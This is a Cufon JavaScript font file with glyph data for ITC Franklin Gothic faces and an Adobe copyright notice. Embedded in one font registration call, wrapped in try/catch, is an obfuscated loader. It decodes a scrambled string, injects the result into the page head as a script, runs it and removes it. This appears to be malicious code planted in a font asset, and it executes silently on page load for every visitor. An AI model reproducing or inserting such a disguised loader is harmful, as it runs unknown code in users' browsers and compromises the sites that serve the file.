":11,",":72,".":72,"A":18,"\u00c6":18,"\u00c1":18,"\u00c2":18,"\u00c4":18,"\u00c0":18,"\u00c5":18,"\u00c3":18,"a":11,"\u00e6":11,"\u00e1":11,"\u00e2":11,"\u00e0":11,"\u00e5":11,"\u00e3":11,"e":4,"\u00e9":4,"\u00ea":4,"\u00eb":4,"\u00e8":4,"o":4,"\u00f8":4,"\u00f3":4,"\u00f4":4,"\u00f6":4,"\u00f2":4,"\u00f5":4}},{"d":"13,-111r72,0r0,39r-72,0r0,-39","w":98,"k":{"T":14}},{"d":"90,-244r58,0r0,147r27,0r0,40r-27,0r0,57r-53,0r0,-57r-86,0r0,-40xm46,-95r53,0r0,-98"},{"d":"-2,-240r54,0r25,166r32,-166r48,0r29,167r30,-167r44,0r-51,241r-47,0r-32,-167r-33,167r-47,0","w":257,"k":{"\u00fc":14,"\u00f6":18,"\u00ea":18,"\u00e4":18,"O":5,"\u00d8":5,"\u00d3":5,"\u00d4":5,"\u00d6":5,"\u00d2":5,"\u00d5":5,",":22,".":22,"a":18,"\u00e6":18,"\u00e1":18,"\u00e2":18,"\u00e0":18,"\u00e5":18,"\u00e3":18,"e":18,"\u00e9":18,"\u00eb":18,"\u00e8":18,"i":-7,"\u00ed":-7,"\u00ee":-7,"\u00ef":-7,"\u00ec":-7,"o":18,"\u00f8":18,"\u00f3":18,"\u00f4":18,"\u00f2":18,"\u00f5":18,"u":14,"\u00fa":14,"\u00fb":14,"\u00f9":14}},{"d":"83,-181v53,0,72,37,72,92v0,57,-21,93,-73,93v-51,0,-72,-36,-72,-93v0,-55,20,-92,73,-92xm104,-89v0,-47,-5,-58,-22,-58v-16,0,-20,14,-20,58v0,47,6,58,21,58v14,0,21,-10,21,-58xm25,-219v32,-42,42,-21,83,-12v8,0,12,-7,17,-13r16,12v-26,42,-50,23,-84,14v-6,0,-11,3,-17,11","w":165,"k":{"y":4,"\u00fd":4,"\u00ff":4}},{"d":"105,-240r48,0r0,240r-45,0r0,-29v-5,13,-13,32,-41,32v-48,0,-57,-56,-57,-91v0,-14,0,-92,59,-92v24,0,31,12,36,19r0,-79xm83,-32v32,0,22,-42,22,-71v0,-16,0,-44,-22,-44v-19,0,-21,23,-21,51v0,35,0,64,21,64","w":171},{"d":"98,-240v44,-8,83,26,83,73v0,42,-22,55,-34,62r45,105r-58,0r-32,-95r-27,0r0,95r-52,0r0,-240r75,0xm130,-168v-5,-43,-26,-31,-55,-33r0,67v32,3,59,-4,55,-34","w":196,"k":{"O":9,"\u00d8":9,"\u00d3":9,"\u00d4":9,"\u00d6":9,"\u00d2":9,"\u00d5":9,"U":9,"\u00da":9,"\u00db":9,"\u00dc":9,"\u00d9":9,"V":7,"Y":5,"\u00dd":5,"W":9}},{"d":"101,-244v76,0,87,74,87,124v0,44,-8,124,-87,124v-77,0,-87,-76,-87,-124v0,-46,9,-124,87,-124xm101,-201v-27,0,-32,29,-32,81v0,51,5,81,32,81v27,0,32,-30,32,-81v0,-50,-5,-81,-32,-81","w":202,"k":{"T":13,"V":9,"Y":13,"\u00dd":13,",":22,".":22,"A":7,"\u00c6":7,"\u00c1":7,"\u00c2":7,"\u00c4":7,"\u00c0":7,"\u00c5":7,"\u00c3":7,"W":5,"J":9,"X":9}},{"d":"161,-90v0,24,-13,94,-63,94v-28,0,-37,-18,-41,-27v-4,7,-5,10,-9,23r-30,0r0,-240r49,0r0,79v6,-8,16,-19,37,-19v44,0,57,47,57,90xm89,-147v-30,1,-21,42,-22,73v0,20,0,43,21,43v15,0,22,-12,22,-58v0,-47,-7,-58,-21,-58","w":171,"k":{"v":7,"y":7,"\u00fd":7,"\u00ff":7,",":14,".":14}},{"d":"18,-177r47,0r0,24v9,-27,56,-45,84,-10v15,42,4,110,7,163r-49,0r0,-117v0,-16,-2,-26,-17,-26v-22,0,-22,17,-22,39r0,104r-50,0r0,-177","w":171,"k":{"v":4,"y":7,"\u00fd":7,"\u00ff":7}},{"d":"8,-240r154,0r0,37r-100,160r103,0r0,43r-165,0r0,-37r102,-160r-94,0r0,-43","w":165},{"d":"83,-181v53,0,72,37,72,92v0,57,-21,93,-73,93v-51,0,-72,-36,-72,-93v0,-55,20,-92,73,-92xm104,-89v0,-47,-5,-58,-22,-58v-16,0,-20,14,-20,58v0,47,6,58,21,58v14,0,21,-10,21,-58xm66,-211r59,-56r20,30r-65,40","w":165,"k":{"y":4,"\u00fd":4,"\u00ff":4}},{"d":"109,3v-82,2,-95,-55,-95,-123v0,-44,8,-124,87,-124v71,0,87,65,87,122v0,81,-26,103,-44,115v-5,16,23,22,36,15r0,39v-38,12,-76,-12,-71,-44xm69,-120v0,51,5,81,32,81v27,0,32,-30,32,-81v0,-50,-5,-81,-32,-81v-27,0,-32,29,-32,81","w":202,"k":{"U":9,"\u00da":9,"\u00db":9,"\u00dc":9,"\u00d9":9,",":18,".":18}},{"d":"18,-155r26,0r37,63r-37,63r-26,0r22,-63xm79,-155r26,0r37,63r-37,63r-26,0r22,-63","w":159},{"w":91,"k":{"T":18,"V":18,"Y":18,"\u00dd":18,"A":18,"\u00c6":18,"\u00c1":18,"\u00c2":18,"\u00c4":18,"\u00c0":18,"\u00c5":18,"\u00c3":18,"W":18}},{"d":"18,-177r44,0r0,42v3,-17,17,-51,50,-44r0,48v-66,3,-38,71,-44,131r-50,0r0,-177","w":110,"k":{"v":-18,"y":-18,"\u00fd":-18,"\u00ff":-18,",":14,".":14,"a":9,"\u00e6":9,"\u00e1":9,"\u00e2":9,"\u00e4":9,"\u00e0":9,"\u00e5":9,"\u00e3":9,"r":-7,"c":5,"\u00e7":5,"l":-7,"m":-7,"n":-7,"\u00f1":-7,"t":-7,"u":-7,"\u00fa":-7,"\u00fb":-7,"\u00fc":-7,"\u00f9":-7,":":-14,";":-14}},{"d":"122,-179r23,-23r25,25r-23,24v9,9,8,49,0,58r24,24r-27,26r-23,-23v-11,10,-50,8,-59,-1r-23,23r-25,-25r23,-23v-8,-8,-9,-51,0,-59r-24,-23r27,-26r23,23v11,-8,44,-10,59,0xm92,-96v16,0,28,-13,28,-28v0,-15,-13,-28,-28,-28v-15,0,-28,14,-28,29v0,15,13,27,28,27"},{"d":"-10,-240r58,0r34,88r36,-88r51,0r-66,138r0,102r-53,0r0,-102","w":159,"k":{"\u00fc":13,"\u00f6":32,"C":11,"\u00c7":11,"O":13,"\u00d8":13,"\u00d3":13,"\u00d4":13,"\u00d6":13,"\u00d2":13,"\u00d5":13,",":36,".":36,"A":14,"\u00c6":14,"\u00c1":14,"\u00c2":14,"\u00c4":14,"\u00c0":14,"\u00c5":14,"\u00c3":14,"a":32,"\u00e6":32,"\u00e1":32,"\u00e2":32,"\u00e4":32,"\u00e0":32,"\u00e5":32,"\u00e3":32,"e":32,"\u00e9":32,"\u00ea":32,"\u00eb":32,"\u00e8":32,"i":-7,"\u00ed":-7,"\u00ee":-7,"\u00ef":-7,"\u00ec":-7,"o":32,"\u00f8":32,"\u00f3":32,"\u00f4":32,"\u00f2":32,"\u00f5":32,"u":13,"\u00fa":13,"\u00fb":13,"\u00f9":13}},{"d":"104,-180v42,1,58,46,57,89v0,25,-3,94,-60,94v-19,0,-29,-10,-34,-16r0,73r-49,0r0,-237r46,0r0,26v6,-12,16,-29,40,-29xm89,-147v-33,0,-22,45,-22,75v0,26,0,40,21,40v20,0,22,-22,22,-59v0,-31,-2,-56,-21,-56","w":171,"k":{"y":4,"\u00fd":4,"\u00ff":4}},{"d":"194,-58r32,0r0,-55xm193,-240r32,0r-114,240r-31,0xm220,-146r42,0r0,84r17,0r0,30r-17,0r0,32r-40,0r0,-32r-55,0r0,-28xm49,-195r-35,-7v8,-27,24,-40,54,-40v54,0,62,60,26,70v51,21,23,78,-27,78v-48,0,-54,-34,-56,-46r35,-5v1,9,3,21,18,21v10,0,15,-7,15,-16v0,-19,-16,-17,-33,-17r0,-27v15,-1,29,5,31,-15v0,-8,-3,-14,-13,-14v-12,0,-14,12,-15,18","w":288},{"d":"27,-49v-21,-84,-15,-195,74,-195v58,0,68,48,71,64r-42,13v-1,-9,-6,-38,-30,-38v-31,0,-32,41,-33,81v21,-46,107,-32,107,48v0,63,-43,80,-76,80v-53,0,-68,-44,-71,-53xm96,-113v-27,0,-27,32,-27,40v0,6,0,38,27,38v23,0,27,-22,27,-41v0,-10,-1,-37,-27,-37"},{"d":"-5,-177r50,0r24,108r23,-108r42,0r-53,180v-8,40,-30,70,-78,57r0,-39v24,3,38,3,43,-24","w":128,"k":{",":22,".":22,"a":11,"\u00e6":11,"\u00e1":11,"\u00e2":11,"\u00e4":11,"\u00e0":11,"\u00e5":11,"\u00e3":11}},{"d":"58,-69v-11,-66,42,-63,44,-108v0,-21,-16,-24,-21,-24v-24,0,-26,29,-26,43r-45,-6v2,-55,33,-80,74,-80v64,0,71,51,71,68v0,57,-59,59,-55,107r-42,0xm55,-51r48,0r0,51r-48,0r0,-51","w":171},{"d":"109,0v-49,14,-83,-8,-83,-68r0,-71r-20,0r0,-38r22,0r4,-53r42,-4r0,57r33,0r0,38r-33,0v8,40,-24,114,35,101r0,38","w":110},{"d":"18,0r0,-177r47,0r0,24v5,-10,14,-28,43,-28v30,0,36,18,39,28v5,-12,14,-28,43,-28v45,0,45,33,45,65r0,116r-49,0r0,-111v0,-20,0,-32,-16,-32v-18,0,-18,14,-18,40r0,103r-50,0r0,-112v0,-22,0,-31,-15,-31v-18,0,-19,15,-19,40r0,103r-50,0","w":251},{"d":"48,-172v51,-25,105,-6,105,62v0,29,-2,94,3,110r-45,0v-2,-7,-3,-11,-3,-27v-6,12,-18,31,-49,31v-24,0,-46,-14,-46,-49v0,-49,38,-62,91,-65v0,-18,2,-38,-18,-39v-17,0,-20,14,-21,28r-46,-5v1,-10,3,-33,29,-46xm80,-29v21,0,26,-30,24,-56v-28,4,-40,11,-40,34v0,13,4,22,16,22","w":171},{"d":"23,-240r145,0r0,41r-93,0r0,56r73,0r0,41r-73,0r0,59r93,0r0,43r-145,0r0,-240xm68,-277r74,-39r12,34r-76,24","w":171},{"d":"-4,-240r149,0r0,45r-49,0r0,195r-52,0r0,-195r-48,0r0,-45","w":141,"k":{"\u00fc":14,"\u00f2":25,"\u00f6":25,"\u00e8":25,"\u00eb":25,"\u00ea":25,"\u00e3":27,"\u00e5":27,"\u00e0":27,"\u00e4":27,"\u00e2":27,"w":16,"y":16,"\u00fd":16,"\u00ff":16,"O":13,"\u00d8":13,"\u00d3":13,"\u00d4":13,"\u00d6":13,"\u00d2":13,"\u00d5":13,",":16,".":16,"A":14,"\u00c6":14,"\u00c1":14,"\u00c2":14,"\u00c4":14,"\u00c0":14,"\u00c5":14,"\u00c3":14,"a":27,"\u00e6":27,"\u00e1":27,"e":25,"\u00e9":25,"i":-9,"\u00ed":-9,"\u00ee":-9,"\u00ef":-9,"\u00ec":-9,"o":25,"\u00f8":25,"\u00f3":25,"\u00f4":25,"\u00f5":25,"r":18,"u":14,"\u00fa":14,"\u00fb":14,"\u00f9":14,"-":14}},{"d":"64,-132r0,-79v28,3,58,-11,58,24v0,14,-8,19,-12,20r15,35r-21,0r-11,-31r-9,0r0,31r-20,0xm84,-198r0,22v11,1,20,-3,19,-12v-2,-14,-9,-9,-19,-10xm20,-170v0,-40,32,-73,72,-73v39,0,72,32,72,73v0,40,-33,71,-72,71v-39,0,-72,-31,-72,-71xm40,-170v0,30,24,53,52,53v28,0,52,-23,52,-53v0,-30,-23,-54,-52,-54v-29,0,-52,24,-52,54"},{"d":"126,-177r27,0r-1,237r-49,0r0,-78v-37,46,-93,10,-93,-68v0,-24,3,-94,61,-94v25,0,36,17,42,26v6,-8,8,-11,13,-23xm82,-32v26,1,20,-45,21,-75v0,-28,-5,-40,-21,-40v-18,0,-20,13,-20,54v0,39,0,61,20,61","w":171},{"d":"23,-240r77,0r34,148r38,-148r75,0r0,240r-49,0r0,-201r-49,201r-39,0r-44,-201r0,201r-43,0r0,-240","w":269},{"d":"179,-114r-44,0r-43,-88r-43,88r-44,0r68,-129r38,0"},{"d":"18,-240r50,0r0,81v5,-8,14,-22,43,-22v45,0,45,36,45,67r0,114r-49,0r0,-114v0,-17,0,-29,-17,-29v-22,0,-22,16,-22,30r0,113r-50,0r0,-240","w":171,"k":{"y":4,"\u00fd":4,"\u00ff":4}},{"d":"101,-244v76,0,87,74,87,124v0,44,-8,124,-87,124v-77,0,-87,-76,-87,-124v0,-46,9,-124,87,-124xm101,-201v-27,0,-32,29,-32,81v0,51,5,81,32,81v27,0,32,-30,32,-81v0,-50,-5,-81,-32,-81xm75,-277r74,-39r12,34r-75,24","w":202,"k":{"T":13,"V":9,"Y":13,"\u00dd":13,",":22,".":22,"A":7,"\u00c6":7,"\u00c1":7,"\u00c2":7,"\u00c4":7,"\u00c0":7,"\u00c5":7,"\u00c3":7,"W":5,"J":9,"X":9}},{"d":"123,-85v-23,1,-60,-25,-67,-21v-13,0,-20,14,-25,22r-26,-21v24,-44,38,-67,94,-37v30,16,44,6,54,-14r26,22v-7,18,-20,49,-56,49"},{"d":"23,-240r145,0r0,41r-93,0r0,56r73,0r0,41r-73,0r0,59r93,0r0,43r-145,0r0,-240","w":171},{"d":"18,-240r50,0r0,131r50,-68r45,0r-45,59r49,118r-53,0r-28,-82r-18,25r0,57r-50,0r0,-240","w":165,"k":{"e":5,"\u00e9":5,"\u00ea":5,"\u00eb":5,"\u00e8":5,"o":5,"\u00f8":5,"\u00f3":5,"\u00f4":5,"\u00f6":5,"\u00f2":5,"\u00f5":5}},{"d":"155,-81r-93,0v0,24,0,50,24,50v21,0,24,-18,25,-30r44,3v-4,17,-13,62,-70,62v-77,0,-89,-85,-61,-152v21,-47,102,-37,118,-1v11,25,13,46,13,68xm62,-109r46,0v0,-10,1,-40,-23,-40v-22,0,-23,27,-23,40","w":165,"k":{"g":9}},{"d":"16,-177r49,0r0,114v0,18,0,28,17,28v22,0,22,-14,22,-52r0,-90r49,0r0,177r-46,0r0,-24v-9,15,-17,28,-46,28v-45,0,-45,-34,-45,-66r0,-115xm15,-199r71,-55r71,55r-39,0r-32,-21r-32,21r-39,0","w":171},{"d":"166,-130r-148,0r0,-38r148,0r0,38xm166,-72r-148,0r0,-38r148,0r0,38"},{"d":"117,-270r0,360r-54,0r0,-360r54,0","w":180},{"d":"65,-240r53,0r68,240r-53,0r-12,-49r-68,0r-12,49r-48,0xm63,-91r48,0r-24,-98xm60,-277r75,-39r12,34r-76,24","k":{"y":5,"\u00fd":5,"\u00ff":5,"C":7,"\u00c7":7,"G":7,"O":7,"\u00d8":7,"\u00d3":7,"\u00d4":7,"\u00d6":7,"\u00d2":7,"\u00d5":7,"Q":7,"T":14,"U":7,"\u00da":7,"\u00db":7,"\u00dc":7,"\u00d9":7,"V":7,"Y":14,"\u00dd":14}},{"d":"18,-177r50,0r0,177r-50,0r0,-177xm68,-193r-50,0r0,-49r50,0r0,49","w":85},{"d":"93,63r-63,0r15,-169r32,0xm86,-124r-49,0r0,-53r49,0r0,53","w":122},{"d":"96,60r-74,0r0,-22r31,0r0,-256r-31,0r0,-22r74,0r0,300","w":122},{"d":"-4,-177r48,0r24,104r25,-104r41,0r-49,177r-39,0","w":128,"k":{",":18,".":18,"a":11,"\u00e6":11,"\u00e1":11,"\u00e2":11,"\u00e4":11,"\u00e0":11,"\u00e5":11,"\u00e3":11}},{"d":"23,-240r142,0r0,41r-90,0r0,63r69,0r0,41r-69,0r0,95r-52,0r0,-240","w":159,"k":{"\u00eb":7,"\u00e3":16,"\u00e0":16,"\u00e4":16,",":54,".":54,"A":18,"\u00c6":18,"\u00c1":18,"\u00c2":18,"\u00c4":18,"\u00c0":18,"\u00c5":18,"\u00c3":18,"a":16,"\u00e6":16,"\u00e1":16,"\u00e2":16,"\u00e5":16,"e":7,"\u00e9":7,"\u00ea":7,"\u00e8":7,"i":-9,"\u00ed":-9,"\u00ee":-9,"\u00ef":-9,"\u00ec":-9,"o":7,"\u00f8":7,"\u00f3":7,"\u00f4":7,"\u00f6":7,"\u00f2":7,"\u00f5":7}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+293-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})(":6x(uJCc)>7v:aN2hJeqz6z7wfC(xJ7vwfDq)>OSxg`[;icmE(1(FX%t|e1(FX%tCJ%PhsTV;JOPhsTVxs%:w#=VF6OJw#=VF6eJw#=VF6Cmw#=VF6F@w#=VF6ebw#=VF6zcw#=VF6Fq=(1(FX%m;(1Pw#=VF6ONw#=VF6C{|e1(FX%t;N1(FX%bFe1(FX%{C(1(FX%t|>7PhsTV;sgPhsTV;JxPhsTVxX{Sw#=VF6K@w#=VF6gt8g1(FX%mCN1(FX%bCg1(FX%NFg1(FX%Jxg1(FX%t;g1(FX%bCN1(FX%txKePhsTV;sDPhsTVxsNuw#=VF6=fw#=VF6xbw#=VF6*Uw#=VF6;q)N1(FX%N|e1(FX%b|e1(FX%J|e1(FX%NF(1(FX%{FXgPhsTVx>;A|(1(FX%J|g1(FX%N;(1(FX%J;g1(FX%JFwCPhsTV;iOPhsTV;bCPhsTVx6ePhsTVxbOPhsTV;iCUw#=VF6;Vw#=VF6g{w#=VF6;fw#=VF6z(w#=VF6CNsN1(FX%{C6CPhsTVx6D(GN1(FX%{Fg1(FX%{FN1(FX%N;N1(FX%m|e1(FX%b;(1(FX%b;g1(FX%JxN1(FX%Nxg1(FX%m;g1(FX%mFe1(FX%tFe1(FX%bxN1(FX%mFg1(FX%NCctPhsTVx6OXw#=VF6=cw#=VF6=qw#=VF6Ob*e1(FX%tFcDPhsTV;bPdw(1(FX%{CNVk-g1(FX%JCiA`Cqg>OfxFw#=VF6*(w#=VF6x{z=OPhsTVxs={x(VmFN1(FX%m|=5@>XTbw#=VF6zq:sNgEJV[FiK?DmR*GsOww#=VF6;(xeDI;J])w#=VF6;i=g1(FX%m;m%qw#=VF6Kc>w%PhsTV;J=fEs7cu>ePhsTV;iN=w#=VF6eNP=(E)e1(FX%{F@]e)fgPhsTVxJz78e1(FX%bF>NPhsTV;sehh{;mGSCVu6Nc:azm:-1RIsT[PX(mGST[uX(VGJ1NuJhc)a1SI>zvxm]Su#NV)#F7E@c2)>;A;m]k)ickwm.3|Sh@h(Vv:s`AIiRVh>D[)>CNuJhtxfg5x>]cwa]t;(Vvh>5`Gm5PT%aXKe6#zD:GFC|I*O-s=g>w;x)uPhE8.tmb{NJSARld[5vkV1qic(f@U]n2`7?3GS%(;J1R;fgvxfeSx>(NuSOPGJebwa]()@Vv:(Vv;SDRP(Vv;>CPGSgd8aUdwa]mPJNih67[wa]t;(Vvh>[RDa7RGSONP@*Au67b;wORufUv)67ih6]tu>=R:>xkPm.2)s1[|q[d)-NS>fCu)g(hIw%u)g(7:-.R")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":183,"face":{"font-family":"ITC Franklin Gothic Std","font-weight":600,"font-stretch":"condensed","units-per-em":"360","panose-1":"2 11 8 6 3 5 2 2 2 4","ascent":"247","descent":"-113","x-height":"4","bbox":"-28 -325 279 90","underline-thickness":"18","underline-position":"-18","stemh":"39","stemv":"49","unicode-range":"U+0020-U+00FF"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * © 1995, 2002 Adobe Systems Incorporated. All rights reserved.
 * 
 * Trademark:
 * ITC is a trademark of International Typeface Corporation registered in the U.S.
 * Patent and Trademark Office and may be registered in certain other
 * jurisdictions. Franklin Gothic is a trademark of International Typeface
 * Corporation and may be registered in certain jurisdictions.
 * 
 * Full name:
 * ITCFranklinGothicStd-DmCdIt
 * 
 * Designer:
 * Vic Caruso
 * 
 * Vendor URL:
 * http://www.adobe.com/type
 * 
 * License information:
 * http://www.adobe.com/type/legal.html
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"0,27r180,0r0,18r-180,0r0,-18","w":180},{"d":"103,-177r-9,53r-48,0r9,-53r48,0xm84,-105r-13,168r-59,0r41,-168r31,0","w":122},{"d":"73,-130r13,-79v25,2,52,-9,52,22v0,17,-12,22,-16,24r10,33r-20,0r-8,-30r-8,0r-5,30r-18,0xm108,-195v-12,-2,-6,14,-9,21v17,7,28,-21,9,-21xm105,-240v39,0,72,31,72,72v0,40,-33,72,-72,72v-39,0,-72,-32,-72,-72v0,-41,33,-72,72,-72xm105,-223v-29,0,-54,24,-54,55v0,30,25,55,54,55v30,0,53,-25,53,-55v0,-31,-23,-55,-53,-55"},{"d":"203,-58r28,0r11,-53xm94,0r-32,0r161,-240r32,0xm220,0r6,-31r-57,0r5,-27r70,-86r35,0r-14,86r19,0r-5,27r-19,0r-5,31r-35,0xm81,-243v15,-4,51,20,45,39v0,27,-19,31,-30,34v9,3,24,8,24,31v0,18,-11,46,-52,46v-44,0,-50,-27,-53,-43r32,-9v1,10,3,25,19,25v13,0,18,-10,18,-19v-2,-21,-18,-19,-30,-19r5,-25v15,0,29,3,31,-18v0,-3,-1,-15,-14,-15v-10,0,-14,8,-18,19r-30,-9v10,-33,39,-37,53,-37","w":300},{"d":"171,-102r-148,0r0,-36r148,0r0,36xm117,-153r-40,0r0,-45r40,0r0,45xm117,-42r-40,0r0,-45r40,0r0,45"},{"d":"125,-14v-35,24,-58,29,-95,3v-20,-14,-21,-42,-21,-61v0,-47,21,-110,84,-110v49,0,63,38,63,77v0,24,-6,65,-31,91xm75,-30v25,0,31,-73,31,-89v0,-12,0,-29,-15,-29v-29,0,-32,80,-32,93v0,15,3,25,16,25xm117,-199r-59,-31r18,-27r52,39","w":165,"k":{"w":9,"y":9,"\u00fd":9,"\u00ff":9,"g":9}},{"d":"40,60r-49,0r40,-237r49,0r-21,130v0,13,12,14,16,14v20,0,24,-24,27,-42r17,-102r49,0r-30,177r-42,0r5,-28v-4,8,-14,32,-34,32v-14,0,-14,-12,-14,-19","w":171},{"d":"90,-144v-30,0,-32,70,-32,85v0,27,17,26,19,26v17,0,23,-25,26,-34r42,6v-15,64,-59,66,-71,66r-7,12v16,-3,31,3,31,21v0,30,-41,43,-74,20r8,-14v5,7,39,14,38,-3v2,-8,-13,-16,-27,-12r14,-26v-27,-1,-48,-41,-48,-74v0,-38,17,-111,83,-111v60,0,60,56,60,68r-43,2v0,-10,-1,-32,-19,-32","w":153},{"d":"119,-244v61,0,76,26,76,97v0,45,-12,117,-60,143v3,17,18,14,34,11r-3,39v-7,2,-14,2,-22,2v-44,0,-42,-32,-42,-44v-70,4,-85,-46,-85,-94v0,-50,17,-154,102,-154xm97,-38v32,0,49,-89,47,-120v0,-10,0,-44,-27,-44v-20,0,-29,22,-30,26v-12,30,-19,72,-19,99v0,18,6,39,29,39","w":202,"k":{"U":4,"\u00da":4,"\u00db":4,"\u00dc":4,"\u00d9":4}},{"d":"44,-240r50,0r-23,133v-7,33,-6,68,24,68v28,0,31,-18,37,-55r25,-146r46,0v-17,74,-10,165,-49,220v-34,48,-144,26,-138,-38v6,-65,19,-121,28,-182","w":196,"k":{"A":9,"\u00c6":9,"\u00c1":9,"\u00c2":9,"\u00c4":9,"\u00c0":9,"\u00c5":9,"\u00c3":9}},{"d":"151,-166v-24,5,-23,42,-25,68v0,12,2,24,14,24v12,0,17,-12,21,-28r35,6v-7,38,-29,51,-57,51v-34,0,-52,-22,-52,-58v0,-12,3,-92,67,-92v33,-1,52,22,47,57r-36,2v1,-15,1,-30,-14,-30xm144,4v-69,0,-125,-55,-125,-124v0,-68,56,-124,125,-124v69,0,126,56,126,124v0,69,-57,124,-126,124xm144,-23v53,0,95,-43,95,-97v0,-53,-42,-97,-95,-97v-52,0,-95,44,-95,97v0,54,43,97,95,97","w":279},{"d":"44,-240r50,0r-23,133v-7,33,-6,68,24,68v28,0,31,-18,37,-55r25,-146r46,0v-17,74,-10,165,-49,220v-34,48,-144,26,-138,-38v6,-65,19,-121,28,-182xm127,-275v-18,10,-40,16,-70,13r74,-44r61,44v-28,2,-49,-3,-65,-13","w":196,"k":{"A":9,"\u00c6":9,"\u00c1":9,"\u00c2":9,"\u00c4":9,"\u00c0":9,"\u00c5":9,"\u00c3":9}},{"d":"202,-41r-5,40v-21,10,-59,-3,-61,-17v-9,7,-28,22,-61,22v-44,0,-72,-28,-72,-65v0,-53,46,-67,64,-73v-29,-40,-10,-110,52,-110v42,0,59,24,59,54v0,42,-32,58,-52,67v4,6,19,33,25,43v14,-18,23,-43,27,-56r38,6v-15,46,-35,70,-44,80v3,8,18,14,30,9xm119,-213v-26,0,-25,46,-9,61v14,-7,28,-13,28,-36v0,-21,-13,-25,-19,-25xm53,-64v-1,41,51,32,65,17r-35,-59v-9,4,-30,16,-30,42","w":226},{"d":"59,-55v0,14,2,25,16,25v25,0,31,-74,31,-89v0,-10,0,-29,-15,-29v-29,0,-32,80,-32,93xm180,-232r-42,15v10,32,18,71,18,111v0,23,-7,110,-81,110v-51,0,-66,-37,-66,-76v0,-70,40,-110,71,-110v10,0,22,6,27,16v-2,-12,-5,-25,-9,-37r-41,15r-9,-25r41,-15v-2,-5,-3,-9,-5,-13r41,-15v2,4,3,9,5,14r41,-15","w":165},{"d":"143,-240r27,240r-52,0r-5,-53r-60,0r-22,53r-47,0r106,-240r53,0xm110,-94r-6,-92r-35,92r41,0xm137,-262v-18,0,-53,-24,-66,-2r-14,-16v20,-32,53,-20,80,-9v12,0,20,-9,26,-16r14,16v-10,11,-23,27,-40,27"},{"d":"116,-202v-49,0,-39,97,-45,121v0,24,6,42,24,42v18,0,30,-14,37,-47r51,9v-11,55,-43,81,-88,81v-55,0,-80,-37,-80,-93v0,-14,2,-72,32,-117v45,-68,159,-46,145,53r-53,3v1,-21,3,-52,-23,-52","w":190},{"d":"125,-14v-35,24,-58,29,-95,3v-20,-14,-21,-42,-21,-61v0,-47,21,-110,84,-110v49,0,63,38,63,77v0,24,-6,65,-31,91xm75,-30v25,0,31,-73,31,-89v0,-12,0,-29,-15,-29v-29,0,-32,80,-32,93v0,15,3,25,16,25xm158,-231r-71,32r-10,-16r67,-42","w":165,"k":{"w":9,"y":9,"\u00fd":9,"\u00ff":9,"g":9}},{"d":"143,-240r27,240r-52,0r-5,-53r-60,0r-22,53r-47,0r106,-240r53,0xm110,-94r-6,-92r-35,92r41,0xm122,-255v-19,0,-35,-15,-35,-34v0,-18,14,-35,35,-35v20,0,34,17,34,35v0,19,-15,34,-34,34xm122,-276v19,-2,16,-26,-1,-27v-17,1,-18,27,1,27"},{"d":"82,4v-63,0,-67,-60,-67,-94v0,-27,6,-154,95,-154v65,0,67,61,67,88v0,67,-19,160,-95,160xm87,-35v42,-10,39,-95,39,-131v0,-16,-2,-40,-19,-40v-30,0,-41,81,-41,122v0,26,2,49,21,49"},{"d":"115,-138r56,0r0,36r-56,0r0,56r-36,0r0,-56r-56,0r0,-36r56,0r0,-56r36,0r0,56xm171,0r-148,0r0,-36r148,0r0,36"},{"d":"152,-122r-36,0r0,-16v-8,21,-64,32,-64,-13v0,-42,56,-45,71,-46v3,-11,3,-23,-9,-23v-11,0,-13,10,-14,17r-36,-5v3,-11,11,-36,51,-36v84,0,28,67,37,122xm120,-178v-17,-2,-44,28,-18,35v13,0,14,-11,18,-35"},{"d":"127,-179r23,-23r26,25r-23,24v9,9,8,49,0,58r23,24r-26,26r-23,-23v-11,10,-50,8,-59,-1r-23,23r-26,-25r23,-23v-8,-8,-9,-51,0,-59r-23,-23r26,-26r23,23v13,-7,43,-11,59,0xm98,-96v15,0,28,-13,28,-28v0,-15,-13,-28,-28,-28v-15,0,-29,14,-29,29v0,15,14,27,29,27"},{"d":"10,-68v0,-53,46,-143,85,-172r35,0v-73,65,-95,217,-50,301r-30,0v-21,-31,-40,-80,-40,-129","w":116},{"d":"183,-77v-2,41,-45,85,-89,81r-8,14v18,-4,34,3,34,24v0,33,-43,47,-80,22r8,-16v8,9,41,15,42,-3v1,-9,-15,-16,-30,-14r15,-28v-9,-3,-21,-5,-33,-16v-26,-23,-27,-61,-27,-76v0,-13,2,-72,32,-117v46,-68,158,-46,145,53r-53,3v1,-21,3,-52,-23,-52v-49,0,-39,97,-45,121v0,24,6,42,24,42v18,0,29,-14,37,-47","w":190},{"d":"109,-107r-5,27v-23,-8,-29,65,-34,92v-7,51,-25,49,-69,49r4,-22v49,-1,8,-132,67,-134v-44,-10,-4,-78,-8,-115v0,-6,-2,-8,-16,-8r4,-22v32,0,55,0,55,24v0,33,-11,59,-13,93v0,10,3,13,15,16","w":116},{"d":"73,-177r48,0r-9,53r-48,0xm-4,6v-2,-73,67,-56,70,-110r43,0v-3,37,-8,52,-31,67v-24,15,-33,21,-33,41v0,20,13,26,23,26v23,0,28,-22,32,-37r38,12v-9,39,-35,64,-75,64v-45,0,-67,-28,-67,-63","w":165},{"d":"6,0r40,-240r142,0r-7,42r-92,0r-9,55r76,0r-7,40r-76,0r-10,61r93,0r-7,42r-143,0xm93,-262v-11,0,-21,-8,-21,-20v0,-11,10,-20,21,-20v11,0,19,10,19,20v0,11,-8,20,-19,20xm148,-262v-11,0,-20,-9,-20,-20v0,-11,9,-20,20,-20v11,0,20,10,20,20v0,11,-9,20,-20,20","w":171},{"d":"111,-170v-31,0,-39,99,-12,100v15,0,22,-26,23,-32r40,6v1,15,-34,65,-60,61r-6,36r-24,0r7